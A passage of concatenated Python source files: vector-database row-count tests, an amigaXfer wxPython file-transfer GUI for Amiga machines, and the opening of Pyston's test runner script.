def get_hamming_index_params(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
def test_table_rows_count(self, connect, ham_table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(table_name=ham_table, records=vectors)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(ham_table)
assert res == nb
def test_table_rows_count_after_index_created(self, connect, ham_table, get_hamming_index_params):
'''
target: test get_table_row_count, after index have been created
method: add vectors in db, and create index, then calling get_table_row_count with correct params
expected: get_table_row_count raise exception
'''
nb = 100
index_params = get_hamming_index_params
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(table_name=ham_table, records=vectors)
time.sleep(add_time_interval)
# logging.getLogger().info(index_params)
connect.create_index(ham_table, index_params)
status, res = connect.get_table_row_count(ham_table)
assert res == nb
@pytest.mark.level(2)
def test_count_without_connection(self, ham_table, dis_connect):
'''
target: test get_table_row_count, without connection
method: calling get_table_row_count with correct params, with a disconnected instance
expected: get_table_row_count raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.get_table_row_count(ham_table)
def test_table_rows_count_no_vectors(self, connect, ham_table):
'''
target: test table rows_count is correct or not, if table is empty
method: create table and no vectors in it,
assert the value returned by get_table_row_count method is equal to 0
expected: the count is equal to 0
'''
table_name = gen_unique_str("test_table")
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size}
connect.create_table(param)
status, res = connect.get_table_row_count(ham_table)
assert res == 0
def test_table_rows_count_multi_tables(self, connect):
'''
target: test table rows_count is correct or not with multiple tables of IP
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 100
tmp, vectors = gen_binary_vectors(nq, dim)
table_list = []
for i in range(20):
table_name = gen_unique_str('test_table_rows_count_multi_tables')
table_list.append(table_name)
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.HAMMING}
connect.create_table(param)
res = connect.add_vectors(table_name=table_name, records=vectors)
time.sleep(2)
for i in range(20):
status, res = connect.get_table_row_count(table_list[i])
assert status.OK()
assert res == nq
class TestTableCountTANIMOTO:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
5000,
100000,
],
)
def add_vectors_nb(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index_params()
)
def get_tanimoto_index_params(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
def test_table_rows_count(self, connect, tanimoto_table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(table_name=tanimoto_table, records=vectors)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(tanimoto_table)
assert res == nb
|
DosFrame.py
|
import wx
import os
import re
import time
import threading
from DosLibrary import DosLibrary
from DosUtils import DosUtils
class DosFrame(wx.Frame):
def __init__(self):
self.endcallback = None
self.ser = None
self.amiga = None
self.execlib = None
self.doslib = None
self.snip = None
self.abort = threading.Event()
self.wantclose = False
self.busy = False
self.bufaddr = None
self.delay = 0
self.delaydisk = 200
self.timerperiod = 50
super().__init__(None, id=wx.ID_ANY, title=u"amigaXfer DOS Tool", pos=wx.DefaultPosition, size=wx.Size(600, 300), style=wx.DEFAULT_FRAME_STYLE | wx.TAB_TRAVERSAL)
self.SetSizeHints(wx.DefaultSize, wx.DefaultSize)
self.SetBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DLIGHT))
bSizer7 = wx.BoxSizer(wx.VERTICAL)
self.m_amigapathmsg = wx.StaticText(self, wx.ID_ANY, u"Amiga path", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_amigapathmsg.Wrap(-1)
bSizer7.Add(self.m_amigapathmsg, 0, wx.ALL, 5)
self.m_amigapath = wx.TextCtrl(self, wx.ID_ANY, u"RAM:", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_amigapath.SetFont(wx.Font(wx.NORMAL_FONT.GetPointSize(), wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, wx.EmptyString))
bSizer7.Add(self.m_amigapath, 0, wx.ALL | wx.EXPAND, 5)
wSizer9 = wx.WrapSizer(wx.HORIZONTAL, wx.WRAPSIZER_DEFAULT_FLAGS)
self.m_fromamiga = wx.Button(self, wx.ID_DOWN, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0)
wSizer9.Add(self.m_fromamiga, 0, wx.ALL, 5)
self.m_xfermsg = wx.StaticText(self, wx.ID_ANY, u"Xfer", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_xfermsg.Wrap(-1)
wSizer9.Add(self.m_xfermsg, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
self.m_toamiga = wx.Button(self, wx.ID_UP, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0)
wSizer9.Add(self.m_toamiga, 0, wx.ALL, 5)
bSizer7.Add(wSizer9, 0, wx.ALIGN_CENTER_HORIZONTAL, 5)
self.m_localpathmsg = wx.StaticText(self, wx.ID_ANY, u"Local path", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_localpathmsg.Wrap(-1)
bSizer7.Add(self.m_localpathmsg, 0, wx.ALL, 5)
self.m_localpath = wx.FilePickerCtrl(self, wx.ID_ANY, wx.EmptyString, u"Select a file", u"", wx.DefaultPosition, wx.DefaultSize, wx.FLP_OPEN | wx.FLP_USE_TEXTCTRL)
bSizer7.Add(self.m_localpath, 0, wx.ALL | wx.EXPAND, 5)
self.m_staticline2 = wx.StaticLine(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_HORIZONTAL)
bSizer7.Add(self.m_staticline2, 0, wx.EXPAND | wx.ALL, 5)
self.m_progress = wx.Gauge(self, wx.ID_ANY, 100, wx.DefaultPosition, wx.DefaultSize, wx.GA_HORIZONTAL | wx.GA_SMOOTH)
self.m_progress.SetValue(0)
bSizer7.Add(self.m_progress, 0, wx.ALL | wx.EXPAND, 5)
gSizer1 = wx.GridSizer(0, 2, 0, 0)
wSizer10 = wx.WrapSizer(wx.HORIZONTAL, wx.WRAPSIZER_DEFAULT_FLAGS)
self.m_status = wx.TextCtrl(self, wx.ID_ANY, u"Init", wx.DefaultPosition, wx.DefaultSize, wx.TE_READONLY)
self.m_status.SetFont(wx.Font(wx.NORMAL_FONT.GetPointSize(), wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, wx.EmptyString))
wSizer10.Add(self.m_status, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
self.m_overwrite = wx.CheckBox(self, wx.ID_ANY, u"Overwrite", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_overwrite.SetForegroundColour(wx.Colour(255, 0, 0))
wSizer10.Add(self.m_overwrite, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
wSizer10.Add((0, 0), 1, wx.EXPAND, 5)
self.m_timermsg = wx.StaticText(self, wx.ID_ANY, u"Time", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_timermsg.Wrap(-1)
wSizer10.Add(self.m_timermsg, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
self.m_timer = wx.TextCtrl(self, wx.ID_ANY, u" 0.0s", wx.DefaultPosition, wx.DefaultSize, wx.TE_READONLY)
self.m_timer.SetFont(wx.Font(wx.NORMAL_FONT.GetPointSize(), wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, wx.EmptyString))
maxlen = 7
self.m_timer.SetMaxLength(maxlen)
self.m_timer.SetInitialSize(self.m_timer.GetSizeFromTextSize(self.m_timer.GetTextExtent("A" * maxlen)))
wSizer10.Add(self.m_timer, 0, wx.ALL, 5)
self.m_abort = wx.Button(self, wx.ID_ANY, u"Stop", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_abort.Bind(wx.EVT_BUTTON, self.onAbortPressed)
wSizer10.Add(self.m_abort, 0, wx.ALL, 5)
self.m_exit = wx.Button(self, wx.ID_ANY, u"Exit", wx.DefaultPosition, wx.DefaultSize, 0)
wSizer10.Add(self.m_exit, 0, wx.ALL, 5)
bSizer7.Add(wSizer10, 0, wx.EXPAND, 5)
self.SetSizer(bSizer7)
self.Layout()
self.Centre(wx.BOTH)
self.m_abort.Bind(wx.EVT_BUTTON, self.onAbortPressed)
self.m_exit.Bind(wx.EVT_BUTTON, self.onExitPressed)
self.m_overwrite.Bind(wx.EVT_CHECKBOX, self.onOverwriteCheckBox)
self.m_toamiga.Bind(wx.EVT_BUTTON, self.onToAmigaPressed)
self.m_fromamiga.Bind(wx.EVT_BUTTON, self.onFromAmigaPressed)
return
def onCloseSetup(self, event):
if event.CanVeto():
event.Veto()
return
def onClose(self, event):
if event.CanVeto():
event.Veto()
if self.wantclose:
return
if self.busy:
print("Window close request while running. Stopping.")
self.wantclose = True
self.Abort()
return
self.UpdateStatus("UserClose")
self.CleanUp()
return
def onTimer(self, event):
value = time.monotonic() - self.timerbase
self.m_timer.ChangeValue(f"{value:6.1F}s")
return
def onExitPressed(self, event):
self.wantclose = True
wx.CallAfter(self.UpdateStatus, "CleanUp")
wx.CallAfter(self.CleanUp)
return
def onAbortPressed(self, event):
print("Stop requested by user.")
self.Abort()
return
def Abort(self):
self.m_abort.Enable(False)
self.abort.set()
return
def onOverwriteCheckBox(self, event):
danger = self.m_overwrite.GetValue()
if danger:
self.fromamigacolor = self.m_fromamiga.GetForegroundColour()
self.toamigacolor = self.m_toamiga.GetForegroundColour()
self.xfermsgcolor = self.m_xfermsg.GetForegroundColour()
self.m_fromamiga.SetForegroundColour(wx.Colour(255, 0, 0))
self.m_toamiga.SetForegroundColour(wx.Colour(255, 0, 0))
self.m_xfermsg.SetForegroundColour(wx.Colour(255, 0, 0))
else:
self.m_fromamiga.SetForegroundColour(self.fromamigacolor)
self.m_toamiga.SetForegroundColour(self.toamigacolor)
self.m_xfermsg.SetForegroundColour(self.xfermsgcolor)
return
def onToAmigaPressed(self, event):
self.Enablement(False)
self.abort.clear()
self.m_abort.Enable(True)
self.UpdateStatus("Start")
self.busy = True
localpath = self.m_localpath.GetPath()
amigapath = self.m_amigapath.GetValue()
overwrite = self.m_overwrite.GetValue()
print(f"Requested Transfer ToAmiga overwrite: {overwrite}, amigapath: {amigapath}, localpath: {localpath}")
self.timerbase = time.monotonic()
self.timer.Start(self.timerperiod)
threading.Thread(target=self.ToAmigaWorker, args=(localpath, amigapath, overwrite)).start()
return
def onFromAmigaPressed(self, event):
self.Enablement(False)
self.abort.clear()
self.m_abort.Enable(True)
self.UpdateStatus("Start")
self.busy = True
localpath = self.m_localpath.GetPath()
amigapath = self.m_amigapath.GetValue()
overwrite = self.m_overwrite.GetValue()
print(f"Requested Transfer FromAmiga overwrite: {overwrite}, amigapath: {amigapath}, localpath: {localpath}")
self.timerbase = time.monotonic()
self.timer.Start(self.timerperiod)
threading.Thread(target=self.FromAmigaWorker, args=(localpath, amigapath, overwrite)).start()
return
def Stop(self):
self.doslib.Delay(self.delay)
self.timer.Stop()
self.busy = False
self.m_abort.Enable(False)
wx.CallAfter(self.UpdateProgressDone)
if self.wantclose:
wx.CallAfter(self.CleanUp)
else:
self.Enablement(True)
return
def ToAmigaWorker(self, localpath, amigapath, overwrite):
wx.CallAfter(self.UpdateProgressPulse)
if not amigapath:
wx.CallAfter(self.UpdateStatus, "DstFile?")
wx.CallAfter(self.Stop)
return
if not ':' in amigapath:
wx.CallAfter(self.UpdateStatus, "DstVol?")
wx.CallAfter(self.Stop)
return
if amigapath[-1] == '/':
amigapath = amigapath[:-1]
wx.CallAfter(self.UpdateStatus, "Checks")
vol = amigapath.split(':')[0]
if vol.upper() == "RAM":
self.delay = 0
else:
self.delay = self.delaydisk
if vol[0:2].upper() == "DF":
#diskchange, as floppies might have been swapped while interrupts disabled
self.dosutil.inhibit(amigapath[0:4], self.doslib.DOSTRUE)
self.dosutil.inhibit(amigapath[0:4], self.doslib.DOSFALSE)
#FIXME: For huge filetransfers, it might make sense not to read the source file all at once.
try:
with open(localpath, "rb") as fh:
data = fh.read()
except:
data = None
if not data:
wx.CallAfter(self.UpdateStatus, "SrcFile?")
wx.CallAfter(self.Stop)
return
voladdr = self.snip.getaddrstr(vol + ':')
lock = self.doslib.Lock(voladdr, self.doslib.ACCESS_READ)
if not lock:
print("Could not get read lock on volume.")
wx.CallAfter(self.UpdateStatus, "DstVol?")
wx.CallAfter(self.Stop)
return
if not self.doslib.Info(lock, self.bufaddr):
print("Could not Info() lock.")
self.doslib.UnLock(lock)
wx.CallAfter(self.UpdateStatus, "InfoErr.")
wx.CallAfter(self.Stop)
return
self.doslib.UnLock(lock)
diskstate = self.amiga.speek32(self.bufaddr + self.doslib.id_DiskState)
print(f"DiskState: {hex(diskstate)}.")
if diskstate == self.doslib.ID_WRITE_PROTECTED:
print("Disk state ID_WRITE_PROTECTED thus not writable.")
wx.CallAfter(self.UpdateStatus, "WriteProt?")
wx.CallAfter(self.Stop)
return
if diskstate == self.doslib.ID_VALIDATING:
print("Disk state ID_VALIDATING thus not writable.")
wx.CallAfter(self.UpdateStatus, "DskInval?")
wx.CallAfter(self.Stop)
return
if diskstate != self.doslib.ID_VALIDATED:
print(f"Disk state not ID_VALIDATED: {diskstate}")
wx.CallAfter(self.UpdateStatus, "InfoUnk?!")
wx.CallAfter(self.Stop)
return
amigapathaddr = self.snip.getaddrstr(amigapath)
lock = self.doslib.Lock(amigapathaddr, self.doslib.ACCESS_READ)
if lock:
if not self.doslib.Examine(lock, self.bufaddr):
print("Could not Examine() lock.")
self.doslib.UnLock(lock)
wx.CallAfter(self.UpdateStatus, "ExamErr.")
wx.CallAfter(self.Stop)
return
self.doslib.UnLock(lock)
filetype = self.amiga.speek32(self.bufaddr + self.doslib.fib_DirEntryType)
print(f"Filetype: {filetype}")
if (filetype < 0) and (not overwrite):
print("File exists, and overwrite is not enabled.")
wx.CallAfter(self.UpdateStatus, "OverWrit?")
wx.CallAfter(self.Stop)
return
if filetype > 0:
basename = os.path.basename(localpath)
if amigapath[-1] != ":":
amigapath += "/"
amigapath += basename
amigapathaddr = self.snip.getaddrstr(amigapath)
print(f"Target is a dir. New amigapath: {amigapath}")
lock = self.doslib.Lock(amigapathaddr, self.doslib.ACCESS_READ)
if lock:
if not self.doslib.Examine(lock, self.bufaddr):
print("Could not Examine() lock.")
self.doslib.UnLock(lock)
wx.CallAfter(self.UpdateStatus, "SrcFile?")
wx.CallAfter(self.Stop)
return
self.doslib.UnLock(lock)
filetype = self.amiga.speek32(self.bufaddr + self.doslib.fib_DirEntryType)
print(f"Filetype: {filetype}")
if filetype > 0:
print("Target directory exists, but name inside exists and is not a file.")
print(f"path: {localpath}")
wx.CallAfter(self.UpdateStatus, "LNotFile?")
wx.CallAfter(self.Stop)
return
if not overwrite:
print("File exists, and overwrite is not enabled.")
wx.CallAfter(self.UpdateStatus, "OverWrit?")
wx.CallAfter(self.Stop)
return
print(f"Amiga path: {amigapath}, Local path: {localpath}")
if self.abort.is_set():
wx.CallAfter(self.UpdateStatus, "UserStop.")
print("User stopped.")
wx.CallAfter(self.Stop)
return
dosfh = self.doslib.Open(amigapathaddr, self.doslib.MODE_NEWFILE)
print(f"dosfh: {hex(dosfh)}")
if not dosfh:
wx.CallAfter(self.UpdateStatus, "DstFile?")
wx.CallAfter(self.Stop)
return
blocks = len(data) // self.bufsize
if len(data) % self.bufsize:
blocks += 1
wx.CallAfter(self.UpdateProgressRange, blocks)
block = 0
wx.CallAfter(self.UpdateProgressValue, 0)
for offset in range(0, len(data), self.bufsize):
remaining = len(data) - offset
stepsize = min(remaining, self.bufsize)
print(f"transferring {hex(stepsize)} at offset {hex(offset)} remaining {hex(remaining)}")
wx.CallAfter(self.UpdateStatus, "Xfer+CRC")
self.snip.verifiedwritemem(self.bufaddr, data[offset:offset + stepsize])
if self.abort.is_set():
success = self.doslib.Close(dosfh)
wx.CallAfter(self.UpdateStatus, "UserStop.")
print("User stopped.")
wx.CallAfter(self.Stop)
return
wx.CallAfter(self.UpdateStatus, "Write")
returnedLength = self.doslib.Write(dosfh, self.bufaddr, stepsize)
if returnedLength != stepsize:
print(f"returnedLength: {hex(returnedLength)}")
print("Error: size written != requested length.")
wx.CallAfter(self.UpdateStatus, "IOErr.")
success = self.doslib.Close(dosfh)
wx.CallAfter(self.Stop)
block += 1
wx.CallAfter(self.UpdateProgressValue, block)
if self.abort.is_set():
success = self.doslib.Close(dosfh)
wx.CallAfter(self.UpdateStatus, "UserStop.")
print("User stopped.")
wx.CallAfter(self.Stop)
return
print("Closing file.")
wx.CallAfter(self.UpdateStatus, "Close")
success = self.doslib.Close(dosfh)
print("Transfer end.")
wx.CallAfter(self.UpdateStatus, "Done.")
wx.CallAfter(self.Stop)
return
def FromAmigaWorker(self, localpath, amigapath, overwrite):
wx.CallAfter(self.UpdateProgressPulse)
if localpath[-1] == '/' or localpath[-1] == '\\':
localpath = localpath[:-1]
if not amigapath or amigapath[-1] == ':' or amigapath[-1] == '/':
wx.CallAfter(self.UpdateStatus, "SrcFile?")
wx.CallAfter(self.Stop)
return
if amigapath[0:4].upper() == "RAM:":
self.delay = 0
else:
self.delay = self.delaydisk
if amigapath[0:2].upper() == "DF":
#diskchange, as floppies might have been swapped while interrupts disabled
self.dosutil.inhibit(amigapath[0:4], self.doslib.DOSTRUE)
self.dosutil.inhibit(amigapath[0:4], self.doslib.DOSFALSE)
if os.path.exists(localpath) and not os.path.isfile(localpath):
if not os.access(localpath, os.W_OK):
wx.CallAfter(self.UpdateStatus, "LDirPerm?")
print("Target directory is not writable.")
wx.CallAfter(self.Stop)
return
else:
basename = re.split(':|/', amigapath)[-1]
localpath = os.path.join(localpath, basename)
if os.path.exists(localpath):
if os.path.isfile(localpath):
if not os.access(localpath, os.W_OK):
print("Target is not writable.")
wx.CallAfter(self.UpdateStatus, "LFilePerm?")
wx.CallAfter(self.Stop)
return
elif not overwrite:
print("File exists, and overwrite is not enabled.")
wx.CallAfter(self.UpdateStatus, "OverWrit?")
wx.CallAfter(self.Stop)
return
else:
print("Target directory exists, but name inside exists and is not a file.")
print(f"path: {localpath}")
wx.CallAfter(self.UpdateStatus, "LNotFile?")
wx.CallAfter(self.Stop)
return
print(f"Amiga path: {amigapath}, Local path: {localpath}")
try:
fh = open(localpath, "wb")
except:
fh = None
if not fh:
print("Could not open destination file.")
wx.CallAfter(self.UpdateStatus, "DstFile?")
wx.CallAfter(self.Stop)
return
amigapathaddr = self.snip.getaddrstr(amigapath)
lock = self.doslib.Lock(amigapathaddr, self.doslib.ACCESS_READ)
if not lock:
print("Could not Lock() source file.")
wx.CallAfter(self.UpdateStatus, "SrcFile?")
wx.CallAfter(self.Stop)
return
if not self.doslib.Examine(lock, self.bufaddr):
print("Could not Examine() lock.")
self.doslib.UnLock(lock)
wx.CallAfter(self.UpdateStatus, "SrcFile?")
wx.CallAfter(self.Stop)
return
self.doslib.UnLock(lock)
length = self.amiga.peek32(self.bufaddr + self.doslib.fib_Size)
print(f"Source file length: {length}")
if self.abort.is_set():
wx.CallAfter(self.UpdateStatus, "UserStop.")
print("User stopped.")
wx.CallAfter(self.Stop)
return
dosfh = self.doslib.Open(amigapathaddr, self.doslib.MODE_OLDFILE)
if not dosfh:
print("Could not Open() source file.")
wx.CallAfter(self.UpdateStatus, "SrcFile?")
wx.CallAfter(self.Stop)
return
blocks = length // self.bufsize
if length % self.bufsize:
blocks += 1
wx.CallAfter(self.UpdateProgressRange, blocks)
block = 0
wx.CallAfter(self.UpdateProgressValue, block)
for offset in range(0, length, self.bufsize):
wx.CallAfter(self.UpdateStatus, "Read")
remaining = length - offset
stepsize = min(remaining, self.bufsize)
print(f"transferring {hex(stepsize)} at offset {hex(offset)} remaining {hex(remaining)}")
returnedLength = self.doslib.Read(dosfh, self.bufaddr, self.bufsize)
if returnedLength != stepsize:
print(f"returnedLength: {hex(returnedLength)}")
print("Error: size read != requested length.")
self.doslib.Close(dosfh)
wx.CallAfter(self.UpdateStatus, "IOErr.")
wx.CallAfter(self.Stop)
return
if self.abort.is_set():
success = self.doslib.Close(dosfh)
wx.CallAfter(self.UpdateStatus, "UserStop.")
print("User stopped.")
wx.CallAfter(self.Stop)
return
wx.CallAfter(self.UpdateStatus, "Xfer+CRC")
fh.write(self.snip.verifiedreadmem(self.bufaddr, returnedLength))
block += 1
wx.CallAfter(self.UpdateProgressValue, block)
if self.abort.is_set():
success = self.doslib.Close(dosfh)
wx.CallAfter(self.UpdateStatus, "UserStop.")
print("User stopped.")
wx.CallAfter(self.Stop)
return
print("Closing file.")
wx.CallAfter(self.UpdateStatus, "Close")
fh.close()
success = self.doslib.Close(dosfh)
print("Transfer end.")
wx.CallAfter(self.UpdateStatus, "Done.")
wx.CallAfter(self.Stop)
return
def UpdateStatus(self, status):
self.m_status.ChangeValue(status)
return
def UpdateProgressValue(self, value):
self.m_progress.SetValue(value)
return
def UpdateProgressRange(self, value):
self.m_progress.SetRange(value)
return
def UpdateProgressPulse(self):
self.m_progress.Pulse()
return
def UpdateProgressDone(self):
maxval = self.m_progress.GetRange()
self.m_progress.SetValue(maxval)
return
def Enablement(self, enable):
self.m_exit.Enable(enable)
self.m_overwrite.Enable(enable)
self.m_fromamiga.Enable(enable)
self.m_toamiga.Enable(enable)
self.m_localpath.Enable(enable)
self.m_amigapath.Enable(enable)
return
def DosSetup(self, endcallback, ser, amiga, execlib, snip):
self.Bind(wx.EVT_CLOSE, self.onCloseSetup)
self.m_status.ChangeValue(u'Setup')
self.endcallback = endcallback
self.ser = ser
self.amiga = amiga
self.execlib = execlib
self.snip = snip
self.wantclose = False
self.timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.onTimer, self.timer)
self.Enablement(False)
self.m_abort.Enable(False)
self.abort.clear()
threading.Thread(target=self.DosSetupWorker).start()
return
def DosSetupWorker(self):
wx.CallAfter(self.UpdateStatus, "Buffer")
avail = self.execlib.AvailMem(self.execlib.MEMF_PUBLIC)
largest = self.execlib.AvailMem(self.execlib.MEMF_LARGEST | self.execlib.MEMF_PUBLIC)
print(f"MEMF_PUBLIC avail: {hex(avail)}, largest: {hex(largest)}")
if avail > 1024 * 1024 * 2 and largest >= 256 * 1024:
self.bufsize = 256 * 1024
elif avail > 1024 * 1024 and largest >= 128 * 1024:
self.bufsize = 128 * 1024
elif avail > 512 * 1024 and largest >= 64 * 1024:
self.bufsize = 64 * 1024
elif avail > 256 * 1024 and largest >= 16 * 1024:
self.bufsize = 16 * 1024
elif largest > 4096:
self.bufsize = 4096
else:
print("RAM is too low, bailing out.")
wx.CallAfter(self.DosSetupFail)
return
print(f"Allocating bufsize {hex(self.bufsize)}")
self.bufaddr = self.execlib.AllocMem(self.bufsize, self.execlib.MEMF_PUBLIC)
print(f"Allocated buffer @ {hex(self.bufaddr)}")
dosname = self.snip.getaddrstr("dos.library")
self.dosbase = self.execlib.OldOpenLibrary(dosname)
if not self.dosbase:
wx.CallAfter(self.UpdateStatus, "NoDOS?!")
self.doslib = DosLibrary(debugger=self.amiga, base=self.dosbase)
self.dosutil = DosUtils(debugger=self.amiga, execlib=self.execlib, doslib=self.doslib, snippets=self.snip)
wx.CallAfter(self.DosSetupDone)
return
def DosSetupFail(self):
wx.CallAfter(self.endcallback)
return
def DosSetupDone(self):
wx.CallAfter(self.UpdateStatus, "Ready.")
wx.CallAfter(self.Enablement, True)
self.Unbind(wx.EVT_CLOSE, handler=self.onCloseSetup)
self.Bind(wx.EVT_CLOSE, self.onClose)
return
def CleanUp(self):
self.Enablement(False)
threading.Thread(target=self.CleanUpWorker).start()
return
def CleanUpWorker(self):
print("CleanUp start.")
self.execlib.FreeMem(self.bufaddr, self.bufsize)
self.execlib.CloseLibrary(self.dosbase)
print("CleanUp done.")
wx.CallAfter(self.endcallback)
return
|
tester.py
|
# Copyright (c) 2014-2016 Dropbox, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/env python
import Queue
import argparse
import cPickle
import datetime
import functools
import glob
import os
import re
import resource
import shutil
import signal
import subprocess
import sys
import tempfile
import threading
import time
NUM_THREADS = 1
IMAGE = "pyston_dbg"
KEEP_GOING = False
FN_JUST_SIZE = 20
EXTRA_JIT_ARGS = []
TIME_LIMIT = 25
TESTS_TO_SKIP = []
EXIT_CODE_ONLY = False
SKIP_FAILING_TESTS = False
VERBOSE = 1
DISPLAY_SKIPS = False
DISPLAY_SUCCESSES = True
def success_message(msg):
if DISPLAY_SUCCESSES:
return msg
return ""
PYTHONIOENCODING = 'utf-8'
# For fun, can test pypy.
# Tough because the tester will check to see if the error messages are exactly the
# same as the system CPython, but the error messages change over micro CPython versions.
# Pyston compile-time checks the system CPython version to try to give compatible error messages.
TEST_PYPY = 0
def set_ulimits():
# Guard the process from running too long with a hard rlimit.
# But first try to kill it after a second with a SIGALRM, though that's catchable/clearable by the program:
signal.alarm(TIME_LIMIT)
resource.setrlimit(resource.RLIMIT_CPU, (TIME_LIMIT + 1, TIME_LIMIT + 1))
MAX_MEM_MB = 100
resource.setrlimit(resource.RLIMIT_RSS, (MAX_MEM_MB * 1024 * 1024, MAX_MEM_MB * 1024 * 1024))
EXTMODULE_DIR = None
EXTMODULE_DIR_PYSTON = None
THIS_FILE = os.path.abspath(__file__)
_global_mtime = None
def get_global_mtime():
global _global_mtime
if _global_mtime is not None:
return _global_mtime
# Start off by depending on the tester itself
rtn = os.stat(THIS_FILE).st_mtime
assert os.listdir(EXTMODULE_DIR), EXTMODULE_DIR
for fn in os.listdir(EXTMODULE_DIR):
if not fn.endswith(".so"):
continue
rtn = max(rtn, os.stat(os.path.join(EXTMODULE_DIR, fn)).st_mtime)
_global_mtime = rtn
return rtn
def get_expected_output(fn):
sys.stdout.flush()
assert fn.endswith(".py")
expected_fn = fn[:-3] + ".expected"
if os.path.exists(expected_fn):
return 0, open(expected_fn).read(), ""
cache_fn = fn[:-3] + ".expected_cache"
if os.path.exists(cache_fn):
cache_mtime = os.stat(cache_fn).st_mtime
if cache_mtime > os.stat(fn).st_mtime and cache_mtime > get_global_mtime():
try:
return cPickle.load(open(cache_fn))
except (EOFError, ValueError):
pass
# TODO don't suppress warnings globally:
env = dict(os.environ)
env["PYTHONPATH"] = EXTMODULE_DIR
env["PYTHONIOENCODING"] = PYTHONIOENCODING
p = subprocess.Popen(["python", "-Wignore", fn], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=open("/dev/null"), preexec_fn=set_ulimits, env=env)
out, err = p.communicate()
code = p.wait()
r = code, out, err
assert code >= 0, "CPython exited with an unexpected exit code: %d" % (code,)
cPickle.dump(r, open(cache_fn, 'w'))
return r
def canonicalize_stderr(stderr):
"""
For a while we were trying to maintain *exact* stderr compatibility with CPython,
at least for the last line of the stderr.
It was starting to get silly to do this, so instead apply some "canonicalizations"
to map certain groups of error messages together.
"""
stderr = stderr.strip().split('\n')[-1]
substitutions = [
("NameError: global name '", "NameError: name '"),
("AttributeError: '(\w+)' object attribute '(\w+)' is read-only", "AttributeError: \\2"),
(r"TypeError: object.__new__\(\) takes no parameters", "TypeError: object() takes no parameters"),
("IndexError: list assignment index out of range", "IndexError: list index out of range"),
(r"unqualified exec is not allowed in function '(\w+)' it (.*)",
r"unqualified exec is not allowed in function '\1' because it \2"),
]
for pattern, subst_with in substitutions:
stderr = re.sub(pattern, subst_with, stderr)
return stderr
failed = []
class Options(object): pass
# returns a single string, or a tuple of strings that are spliced together (with spaces between) by our caller
def run_test(fn, check_stats, run_memcheck):
opts = get_test_options(fn, check_stats, run_memcheck)
del check_stats, run_memcheck
if opts.skip:
return ("(skipped: %s)" % opts.skip) if DISPLAY_SKIPS else ""
env = dict(os.environ)
env["PYTHONPATH"] = EXTMODULE_DIR_PYSTON
env["PYTHONIOENCODING"] = PYTHONIOENCODING
run_args = [os.path.abspath(IMAGE)] + opts.jit_args + [fn]
start = time.time()
p = subprocess.Popen(run_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=open("/dev/null"),
preexec_fn=set_ulimits, env=env)
out, stderr = p.communicate()
code = p.wait()
elapsed = time.time() - start
if code >= 128:
code -= 256
return determine_test_result(fn, opts, code, out, stderr, elapsed)
def get_test_options(fn, check_stats, run_memcheck):
opts = Options()
opts.check_stats = check_stats
opts.run_memcheck = run_memcheck
opts.statchecks = []
opts.jit_args = ["-rq"] + EXTRA_JIT_ARGS
opts.collect_stats = True
opts.expected = "success"
opts.should_error = False
opts.allow_warnings = []
opts.skip = None
for l in open(fn):
l = l.strip()
if not l:
continue
if l.startswith("\xef\xbb\xbf"): # BOM
l = l[3:]
if not l.startswith("#"):
break
